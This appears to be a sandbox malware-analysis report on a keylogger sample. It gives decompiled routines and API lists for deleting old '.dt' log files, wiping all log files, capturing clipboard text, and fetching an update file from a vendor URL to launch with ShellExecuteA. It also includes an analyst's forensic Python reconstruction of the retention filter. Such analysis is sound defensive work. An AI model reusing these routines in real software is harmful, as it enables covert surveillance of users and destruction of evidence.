    					_t101 = sscanf(_t129 - 0x160, "th_%d-%d-%d_%d-%d-%d", _t129 - 0x20, _t129 - 0x18, _t129 - 0x14, _t129 - 0x1c, _t129 - 0x24, _t129 - 0x44);
    					_t132 =  &(_t132[0x20]);
    					if(_t101 != 6) {
    						goto L5;
    					}
    					goto L3;
    					L5:
    				} while (FindNextFileA( *(_t129 - 0x28), _t129 - 0x18c) != 0);
    				_t77 = FindClose( *(_t129 - 0x28));
    				goto L7;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 004247CE
    • #537.MFC42(\*.), ref: 004247E4
    • #924.MFC42(?,004558C4,00448FA4,\*.), ref: 004247FF
    • #922.MFC42(?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 0042480E
    • #800.MFC42(?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 0042481A
    • #800.MFC42(?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 00424826
    • #3811.MFC42(?,?,?,?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 0042484A
    • FindFirstFileA.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 00424860
    • sscanf.MSVCRT ref: 0042489C
    • sscanf.MSVCRT ref: 004248CA
    • #551.MFC42(?,?,?,?,?,00000000,000000FF), ref: 004248EE
    • #536.MFC42(0000005C,00000001,?,?,?,?,?,?,00000000,000000FF), ref: 00424911
    • #924.MFC42(?,004558C4,00448FA4,0000005C,00000001,?,?,?,?,?,?,00000000,000000FF), ref: 00424922
    • #922.MFC42(?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,?,?,?,?,?,?,00000000,000000FF), ref: 00424931
    • #924.MFC42(?,00000000,?,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,?,?,?,?,?), ref: 00424946
    • #800.MFC42(?,00000000,?,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,?,?,?,?,?), ref: 00424952
    • #800.MFC42(?,00000000,?,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,?,?,?,?,?), ref: 0042495E
    • #800.MFC42(?,00000000,?,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,?,?,?,?,?), ref: 0042496A
    • DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,?,?,?,?), ref: 00424972
    • #800.MFC42(?,?,?,?,?,?,00000000,000000FF), ref: 0042497F
    • FindNextFileA.KERNEL32(?,?,?,?,?,?,?,?,00000000,000000FF), ref: 0042498E
    • FindClose.KERNEL32(?,?,?,?,?,?,?,00000000,000000FF), ref: 0042499F
    • #800.MFC42(?,?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 004249AC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: #800$#924FileFind$#922sscanf$#3811#536#537#551CloseDeleteFirstH_prologNext
    • String ID: %d-%d-%d_%d-%d-%d$\*.$th_%d-%d-%d_%d-%d-%d$|(D
    • API String ID: 2474383201-3394397131
    • Opcode ID: d8c2269e1878d58c2d70a80da3360a4c75bec990216e80994967739dc6c72962
    • Instruction ID: a318d721161369913f553a0bcd1c46d3b64b96353087be9969273a486939b92b
    • Opcode Fuzzy Hash: d8c2269e1878d58c2d70a80da3360a4c75bec990216e80994967739dc6c72962
    • Instruction Fuzzy Hash: 36515C72D0014CAADF11EBE5DD85EDFBBBCAF19304F10416AF505A7181EB38AA49CB64
    Uniqueness

    Uniqueness Score: -1.00%
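The routine at 0x004247C9 is a log-retention sweep: it builds the mask `<dir>\*.dt`, walks it with FindFirstFileA/FindNextFileA, and on each entry runs `sscanf(cFileName, "%d-%d-%d_%d-%d-%d", ...)` (the buffer at `_t129 - 0x160` is the cFileName field, offset 0x2c, of the WIN32_FIND_DATA at `_t129 - 0x18c`), falling back to the `th_`-prefixed format. When six fields parse, it builds a CTime from them (MFC #551), compares it against the current time minus `cfg[0x678] * 0x15180` seconds (0x15180 = 86400, so the config value is a number of days) and, if the comparison in E004249CF succeeds, deletes the file. The following is an added example written for this report, not code from the sample: it reproduces that filter so an analyst can tell from a directory listing and a retention setting which log files the keylogger would have destroyed. That the comparison removes the files older than the cutoff is inferred and is an assumption; the file names are constructed.

```python
"""Added example for this report, not code from the sample: reproduces the
retention filter of the routine at 0x004247C9 (".dt" files named by timestamp,
deleted when older than <days> * 0x15180 seconds).  The direction of the
comparison is an assumption; the listing below is constructed."""
import re
from datetime import datetime, timedelta

SECONDS_PER_DAY = 0x15180   # 86400; multiplied with the day count at config offset 0x678

# Equivalent of the two sscanf formats: optional "th_" prefix, six integers
# separated as Y-M-D_h-m-s; whatever follows (".dt") is ignored because sscanf
# stops at the first non-matching character.
_NAME_RE = re.compile(r"^(?:th_)?(\d+)-(\d+)-(\d+)_(\d+)-(\d+)-(\d+)")


def parse_log_time(name):
    """Return the datetime embedded in a log name, or None when sscanf would not
    yield six fields or the fields do not form a valid date."""
    m = _NAME_RE.match(name)
    if not m:
        return None
    try:
        return datetime(*(int(g) for g in m.groups()))
    except ValueError:       # e.g. month 13; MFC's CTime constructor asserts on these
        return None


def expired_logs(names, now, keep_days):
    """Names the routine would hand to DeleteFileA: .dt files whose embedded
    timestamp is older than now - keep_days * 86400 s (assumed direction)."""
    cutoff = now - timedelta(seconds=keep_days * SECONDS_PER_DAY)
    doomed = []
    for name in names:
        if not name.lower().endswith(".dt"):   # FindFirstFileA mask "<dir>\*.dt"
            continue
        stamp = parse_log_time(name)
        if stamp is not None and stamp < cutoff:
            doomed.append(name)
    return doomed


SAMPLE_NAMES = [   # constructed directory listing
    "2021-02-18_09-15-00.dt",     # older than the window: deleted
    "th_2021-02-18_09-15-00.dt",  # "th_" variant of the same stamp: deleted
    "2021-02-20_23-59-59.dt",     # inside the window: kept
    "notes.dt",                   # sscanf returns 0 for both formats: skipped
    "2021-02-18_09-15-00.txt",    # not matched by the *.dt mask: skipped
]


def run_example():
    """Run the filter over SAMPLE_NAMES with a fixed 'now' and a 2-day window."""
    return expired_logs(SAMPLE_NAMES, datetime(2021, 2, 21, 12, 0, 0), keep_days=2)
```

For forensics the useful inversion is the same arithmetic run backwards: given the retention value recovered from the configuration block and the oldest surviving `.dt` file, the earliest point at which the sweep could last have run is bounded by that file's embedded timestamp plus the window.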

    C-Code - Quality: 55%
    			E0042221F(void* __ecx) {
    				void* _t34;
    				intOrPtr* _t36;
    				intOrPtr _t37;
    				int _t43;
    				int _t47;
    				void* _t72;
    				void* _t73;
    
    				E0043E4E0(0x44239c, _t73);
    				_push("update.tmp");
    				_push(0x4558c8);
    				_push(_t73 - 0x14);
    				L0043DE20();
    				 *(_t73 - 4) = 0;
    				_t34 = E0042900A(__ecx);
    				if(_t34 == 0) {
    					L9:
    					 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
    					L0043DD36();
    					_push(1);
    					_pop(0);
    					L10:
    					 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0xc));
    					return 0;
    				}
    				_push("updates/bpk.dat");
    				L0043DE26();
    				_push("http://www.blazingtools.com/");
    				 *(_t73 - 4) = 1;
    				L0043DE26();
    				_push(_t34);
    				_push(_t34);
    				_t36 = _t73 - 0x1c;
    				 *(_t73 - 4) = 2;
    				_push(_t36);
    				L0043E282();
    				_t37 =  *_t36;
    				_push(0);
    				_push(0);
    				_push( *(_t73 - 0x14));
    				_push(_t37);
    				_push(0);
    				L0043E988();
    				 *((char*)(_t73 - 0xd)) = _t37 >= 0;
    				L0043DD36();
    				 *(_t73 - 4) = 1;
    				L0043DD36();
    				 *(_t73 - 4) = 0;
    				L0043DD36();
    				if( *((intOrPtr*)(_t73 - 0xd)) == 0) {
    					goto L9;
    				}
    				memset(_t73 - 0x1c, 0, 5);
    				_t72 = CreateFileA( *(_t73 - 0x14), 0x80000000, 1, 0, 3, 0, 0);
    				if(_t72 == 0xffffffff) {
    					L5:
    					 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
    					L0043DD36();
    					goto L10;
    				}
    				_t43 = ReadFile(_t72, _t73 - 0x1c, 4, _t73 - 0x20, 0);
    				_push(_t72);
    				if(_t43 != 0) {
    					CloseHandle();
    					DeleteFileA( *(_t73 - 0x14));
    					_t47 = atoi(_t73 - 0x1c);
    					if(_t47 > 0x692) {
    						_push(0xffffffff);
    						_push(0x24);
    						_push(0xe050);
    						L0043E2CA();
    						if(_t47 == 6) {
    							ShellExecuteA(0, "open",  *(E00429029(_t73 - 0x24, 0xe069)), 0, 0, 0);
    							L0043DD36();
    						}
    					}
    					goto L9;
    				} else {
    					CloseHandle();
    					goto L5;
    				}
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00422224
    • #924.MFC42(?,004558C8,update.tmp), ref: 0042223C
      • Part of subcall function 0042900A: InternetGetConnectedState.WININET(?,00000000), ref: 0042901B
    • #537.MFC42(updates/bpk.dat,?,004558C8,update.tmp), ref: 0042225B
    • #537.MFC42(http://www.blazingtools.com/,updates/bpk.dat,?,004558C8,update.tmp), ref: 0042226E
    • #922.MFC42(?,00000000,00000000,http://www.blazingtools.com/,updates/bpk.dat,?,004558C8,update.tmp), ref: 0042227D
    • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0042228B
    • #800.MFC42(?,?,00000000,00000000,http://www.blazingtools.com/,updates/bpk.dat,?,004558C8,update.tmp), ref: 00422299
    • #800.MFC42(?,?,00000000,00000000,http://www.blazingtools.com/,updates/bpk.dat,?,004558C8,update.tmp), ref: 004222A5
    • #800.MFC42(?,?,00000000,00000000,http://www.blazingtools.com/,updates/bpk.dat,?,004558C8,update.tmp), ref: 004222B0
    • memset.MSVCRT ref: 004222C5
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,update.tmp), ref: 004222DC
    • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004222F5
    • CloseHandle.KERNEL32(00000000), ref: 00422300
    • #800.MFC42 ref: 0042230D
    • CloseHandle.KERNEL32(00000000), ref: 00422316
    • DeleteFileA.KERNEL32(?), ref: 0042231F
    • atoi.MSVCRT ref: 00422329
    • #1199.MFC42(0000E050,00000024,000000FF), ref: 00422340
    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00422366
    • #800.MFC42 ref: 0042236F
    • #800.MFC42(?,004558C8,update.tmp), ref: 0042237B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$File$#537CloseHandle$#1199#922#924ConnectedCreateDeleteDownloadExecuteH_prologInternetReadShellStateatoimemset
    • String ID: http://www.blazingtools.com/$open$update.tmp$updates/bpk.dat
    • API String ID: 2648343705-1752780610
    • Opcode ID: 4363ea708f6925a2d96f7f53b07cf424017c3dda2a89f8108f7c52464c5e5b6a
    • Instruction ID: 733a3dbabded4b3e3ac0688eea2b88af01605287e532e2a53e4c3f2536567161
    • Opcode Fuzzy Hash: 4363ea708f6925a2d96f7f53b07cf424017c3dda2a89f8108f7c52464c5e5b6a
    • Instruction Fuzzy Hash: EB41AE71D00209BEEB10EBB1DD86EEF77BCEB19358F50056AF511B21D1DA7C4E048A29
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 61%
    			E004251F0() {
    				void* _t44;
    				void* _t45;
    				void* _t46;
    				void* _t50;
    				intOrPtr _t51;
    				void* _t52;
    				void* _t53;
    				CHAR** _t54;
    				void* _t61;
    				void* _t77;
    				void* _t82;
    
    				_t44 = E0043E4E0(0x442964, _t82);
    				_push(1);
    				_push(0x5c);
    				L0043E34E();
    				 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
    				_t77 = "dt";
    				_push(_t77);
    				_t45 = _t82 - 0x1c;
    				_push(0x4558c4);
    				_push(_t45);
    				L0043DE20();
    				_push(_t44);
    				_push(_t45);
    				_t46 = _t82 - 0x34;
    				 *(_t82 - 4) = 1;
    				_push(_t46);
    				L0043E282();
    				_push("*.");
    				_push(_t46);
    				 *(_t82 - 4) = 2;
    				_push(_t82 - 0x10);
    				L0043DE20();
    				 *(_t82 - 4) = 6;
    				L0043DD36();
    				 *(_t82 - 4) = 5;
    				L0043DD36();
    				 *(_t82 - 4) = 4;
    				L0043DD36();
    				_t61 = FindFirstFileA( *(_t82 - 0x10), _t82 - 0x174);
    				if(_t61 != 0xffffffff) {
    					do {
    						_t51 = _t82 - 0x148;
    						_push(_t51);
    						L0043DE26();
    						 *((intOrPtr*)(_t82 - 0x24)) = _t51;
    						_push(_t77);
    						 *(_t82 - 4) = 7;
    						L0043DE26();
    						_push(_t51);
    						_t52 = _t82 - 0x20;
    						_push(0x4558c4);
    						_push(_t52);
    						 *(_t82 - 4) = 8;
    						L0043E282();
    						_push(0x5c);
    						_push(_t52);
    						_t53 = _t82 - 0x18;
    						 *(_t82 - 4) = 9;
    						_push(_t53);
    						L0043E14A();
    						_push( *((intOrPtr*)(_t82 - 0x24)));
    						 *(_t82 - 4) = 0xa;
    						_push(_t53);
    						_t54 = _t82 - 0x14;
    						_push(_t54);
    						L0043E282();
    						DeleteFileA( *_t54);
    						L0043DD36();
    						 *(_t82 - 4) = 9;
    						L0043DD36();
    						 *(_t82 - 4) = 8;
    						L0043DD36();
    						 *(_t82 - 4) = 7;
    						L0043DD36();
    						 *(_t82 - 4) = 4;
    						L0043DD36();
    					} while (FindNextFileA(_t61, _t82 - 0x174) != 0);
    					FindClose(_t61);
    				}
    				 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
    				L0043DD36();
    				_t50 = 1;
    				 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0xc));
    				return _t50;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 004251F5
    • #536.MFC42(0000005C,00000001,00000000,00000000,00000001), ref: 0042520A
    • #924.MFC42(?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 00425225
    • #922.MFC42(?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 00425234
    • #924.MFC42(?,00000000,00454BA4,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 00425247
    • #800.MFC42(?,00000000,00454BA4,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 00425253
    • #800.MFC42(?,00000000,00454BA4,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 0042525F
    • #800.MFC42(?,00000000,00454BA4,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 0042526B
    • FindFirstFileA.KERNEL32(?,?,?,00000000,00454BA4,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 0042527A
    • #537.MFC42(?), ref: 00425295
    • #537.MFC42(00448FA4,?), ref: 004252A5
    • #922.MFC42(?,004558C4,00000000,00448FA4,?), ref: 004252B4
    • #923.MFC42(?,00000000,0000005C,?,004558C4,00000000,00448FA4,?), ref: 004252C4
    • #922.MFC42(?,00000000,?,?,00000000,0000005C,?,004558C4,00000000,00448FA4,?), ref: 004252D5
    • DeleteFileA.KERNEL32(00000000,?,00000000,?,?,00000000,0000005C,?,004558C4,00000000,00448FA4,?), ref: 004252DC
    • #800.MFC42 ref: 004252E5
    • #800.MFC42 ref: 004252F1
    • #800.MFC42 ref: 004252FD
    • #800.MFC42 ref: 00425309
    • #800.MFC42 ref: 00425315
    • FindNextFileA.KERNEL32(00000000,?), ref: 00425322
    • FindClose.KERNEL32(00000000), ref: 00425331
    • #800.MFC42 ref: 0042533E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#922FileFind$#537#924$#536#923CloseDeleteFirstH_prologNext
    • String ID: d)D
    • API String ID: 2521672067-2238226572
    • Opcode ID: cb994cff8f3a3cd7863efcd7bb46c5e076a6407cc83e4536a2f4cf281a9361fc
    • Instruction ID: 31c07cfcbb4a6913db587de62b8c9b9804f8fda3cf17b0e80b2017485f3751c5
    • Opcode Fuzzy Hash: cb994cff8f3a3cd7863efcd7bb46c5e076a6407cc83e4536a2f4cf281a9361fc
    • Instruction Fuzzy Hash: C5418D71C01289EADB50EBE5D949BDEBBB8AF19318F10459AF405B3182DB7C1B08CA35
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 60%
    			E004255B0(void* __edx) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t66;
    				void* _t67;
    				int _t70;
    				int _t78;
    				intOrPtr _t79;
    				intOrPtr _t80;
    				intOrPtr _t81;
    				intOrPtr _t82;
    				void* _t119;
    				intOrPtr _t122;
    				void* _t130;
    				void* _t132;
    				intOrPtr* _t133;
    
    				_t119 = __edx;
    				_t66 = E0043E4E0(0x4429c0, _t130);
    				_t133 = _t132 - 0x180;
    				_push("\\*.");
    				L0043DE26();
    				_push("dt");
    				_t67 = _t130 - 0x34;
    				_push(0x4558c4);
    				_push(_t67);
    				 *(_t130 - 4) = 0;
    				L0043DE20();
    				_push(_t66);
    				_push(_t67);
    				 *(_t130 - 4) = 1;
    				_push(_t130 - 0x10);
    				L0043E282();
    				 *(_t130 - 4) = 4;
    				L0043DD36();
    				 *(_t130 - 4) = 3;
    				L0043DD36();
    				_t70 = FindFirstFileA( *(_t130 - 0x10), _t130 - 0x18c);
    				 *(_t130 - 0x28) = _t70;
    				if(_t70 == 0xffffffff) {
    					L9:
    					 *(_t130 - 4) =  *(_t130 - 4) | 0xffffffff;
    					L0043DD36();
    					 *[fs:0x0] =  *((intOrPtr*)(_t130 - 0xc));
    					return _t70;
    				} else {
    					goto L1;
    				}
    				do {
    					L1:
    					_t78 = sscanf(_t130 - 0x160, "%d-%d-%d_%d-%d-%d", _t130 - 0x20, _t130 - 0x18, _t130 - 0x14, _t130 - 0x2c, _t130 - 0x1c, _t130 - 0x30);
    					_t122 =  *((intOrPtr*)(_t130 + 8));
    					_t133 = _t133 + 0x20;
    					if(_t78 == 6) {
    						L5:
    						_push(0xffffffff);
    						_push( *((intOrPtr*)(_t130 - 0x30)));
    						_push( *((intOrPtr*)(_t130 - 0x1c)));
    						_push( *((intOrPtr*)(_t130 - 0x2c)));
    						_push( *((intOrPtr*)(_t130 - 0x14)));
    						_push( *((intOrPtr*)(_t130 - 0x18)));
    						_push( *((intOrPtr*)(_t130 - 0x20)));
    						L0043E49E();
    						_push(0);
    						L0043E288();
    						_t79 =  *_t78;
    						_push(0);
    						 *((intOrPtr*)(_t130 - 0x3c)) = _t79;
    						L0043E288();
    						_t80 =  *((intOrPtr*)(_t79 + 4));
    						_push(0);
    						 *((intOrPtr*)(_t130 - 0x4c)) = _t80;
    						L0043E288();
    						_t81 =  *((intOrPtr*)(_t80 + 8));
    						_push(0);
    						 *((intOrPtr*)(_t130 - 0x44)) = _t81;
    						L0043E288();
    						_t82 =  *((intOrPtr*)(_t81 + 0xc));
    						_push(0);
    						 *((intOrPtr*)(_t130 - 0x24)) = _t82;
    						L0043E288();
    						_push(0);
    						L0043E288();
    						_push(0xffffffff);
    						_push( *((intOrPtr*)(_t130 - 0x3c)));
    						_push( *((intOrPtr*)(_t130 - 0x4c)));
    						_push( *((intOrPtr*)(_t130 - 0x44)));
    						_push( *((intOrPtr*)(_t130 - 0x24)));
    						_push( *((intOrPtr*)(_t82 + 0x10)) + 1);
    						_push( *((intOrPtr*)(_t82 + 0x14)) + 0x76c);
    						L0043E49E();
    						_push(_t130 - 0x40);
    						 *((intOrPtr*)(_t130 - 0x24)) = _t133;
    						 *_t133 =  *((intOrPtr*)(_t130 - 0x40));
    						if(L0042387B(_t133, 0, _t119, _t122 + 0x120,  *((intOrPtr*)(_t82 + 0x10)) + 1) != 0) {
    							E004283A6( *((intOrPtr*)(_t130 + 0xc)), _t130 - 0x160);
    							 *((intOrPtr*)( *((intOrPtr*)(_t130 + 0x10)))) =  *((intOrPtr*)( *((intOrPtr*)(_t130 + 0x10)))) +  *((intOrPtr*)(_t130 - 0x16c));
    						}
    						goto L7;
    					}
    					if( *((intOrPtr*)(_t122 + 0x140)) == 0 &&  *((intOrPtr*)(_t122 + 0x14f)) == 0) {
    						_t78 = sscanf(_t130 - 0x160, "th_%d-%d-%d_%d-%d-%d", _t130 - 0x20, _t130 - 0x18, _t130 - 0x14, _t130 - 0x2c, _t130 - 0x1c, _t130 - 0x30);
    						_t133 = _t133 + 0x20;
    						if(_t78 != 6) {
    							goto L7;
    						}
    						goto L5;
    					}
    					L7:
    				} while (FindNextFileA( *(_t130 - 0x28), _t130 - 0x18c) != 0);
    				_t70 = FindClose( *(_t130 - 0x28));
    				goto L9;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 004255B5
    • #537.MFC42(\*.), ref: 004255CB
    • #924.MFC42(?,004558C4,00448FA4,\*.), ref: 004255E5
    • #922.MFC42(?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 004255F4
    • #800.MFC42(?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 00425600
    • #800.MFC42(?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 0042560C
    • FindFirstFileA.KERNEL32(?,?,?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 0042561B
    • sscanf.MSVCRT ref: 00425657
    • sscanf.MSVCRT ref: 004256A0
    • #551.MFC42(?,?,?,?,?,?,000000FF), ref: 004256C5
    • #3337.MFC42(00000000,?,?,?,?,?,?,000000FF), ref: 004256D3
    • #3337.MFC42(00000000,00000000,?,?,?,?,?,?,000000FF), ref: 004256E0
    • #3337.MFC42(00000000,00000000,00000000,?,?,?,?,?,?,000000FF), ref: 004256EE
    • #3337.MFC42(00000000,00000000,00000000,00000000,?,?,?,?,?,?,000000FF), ref: 004256FC
    • #3337.MFC42(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,000000FF), ref: 0042570A
    • #3337.MFC42(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,000000FF), ref: 00425716
    • #551.MFC42(?,?,?,?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 00425736
    • FindNextFileA.KERNEL32(?,?,?,?,?,?,?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00425776
    • FindClose.KERNEL32(?,?,?,?,?,?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00425787
    • #800.MFC42 ref: 00425794
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #3337$#800Find$#551Filesscanf$#537#922#924CloseFirstH_prologNext
    • String ID: %d-%d-%d_%d-%d-%d$\*.$th_%d-%d-%d_%d-%d-%d
    • API String ID: 660066806-1679331109
    • Opcode ID: bcc69f0be05de23c96552e96fae00e0952e03b1e0e1a53516dc19a9d2ce68e27
    • Instruction ID: 3d64c4aef729d216587f9b74db1c9f3144b95c8a1f342f67b1514801903e3a20
    • Opcode Fuzzy Hash: bcc69f0be05de23c96552e96fae00e0952e03b1e0e1a53516dc19a9d2ce68e27
    • Instruction Fuzzy Hash: C6515A72D00118ABCF15EBE5DC81DEEBBBDAF4C314F44416AF515B3291EB38AA058B64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 20%
    			E00428E0F(struct HWND__* _a4, void* _a8) {
    				void* _t12;
    				char* _t17;
    				short* _t24;
    				char* _t31;
    				struct HWND__* _t32;
    				int _t34;
    
    				_t32 = E00428BC9();
    				if(IsWindow(_t32) != 0 && IsWindowUnicode(_t32) != 0) {
    					_push(1);
    					_pop(0);
    				}
    				if(IsClipboardFormatAvailable(0xd) != 0 && 0 != 0) {
    					_push(1);
    					_pop(0);
    				}
    				if(IsClipboardFormatAvailable(1) != 0 || 0 != 0) {
    					if(OpenClipboard(_a4) != 0) {
    						if(0 == 0) {
    							_push(1);
    						} else {
    							_push(0xd);
    						}
    						_t12 = GetClipboardData();
    						_a4 = _t12;
    						if(_t12 != 0) {
    							_t24 = GlobalLock(_t12);
    							if(_t24 != 0) {
    								_push(_t24);
    								if(0 == 0) {
    									L0043DDD2();
    								} else {
    									_t17 = lstrlenW();
    									_t3 =  &(_t17[1]); // 0x1
    									_t34 = _t3;
    									_push(_t34);
    									L0043DD54();
    									_t31 = _t17;
    									WideCharToMultiByte(0, 0, _t24, 0xffffffff, _t31, _t34, 0, 0);
    									_push(_t31);
    									L0043DDD2();
    									_push(_t31);
    									L0043DD42();
    								}
    								GlobalUnlock(_a4);
    							}
    						}
    						CloseClipboard();
    						return 1;
    					}
    					goto L11;
    				} else {
    					L11:
    					return 0;
    				}
    			}

    APIs
      • Part of subcall function 00428BC9: GetCurrentThreadId.KERNEL32 ref: 00428BCE
      • Part of subcall function 00428BC9: GetForegroundWindow.USER32(00000000,?,?,?,00428E19), ref: 00428BD7
      • Part of subcall function 00428BC9: GetWindowThreadProcessId.USER32(00000000), ref: 00428BDE
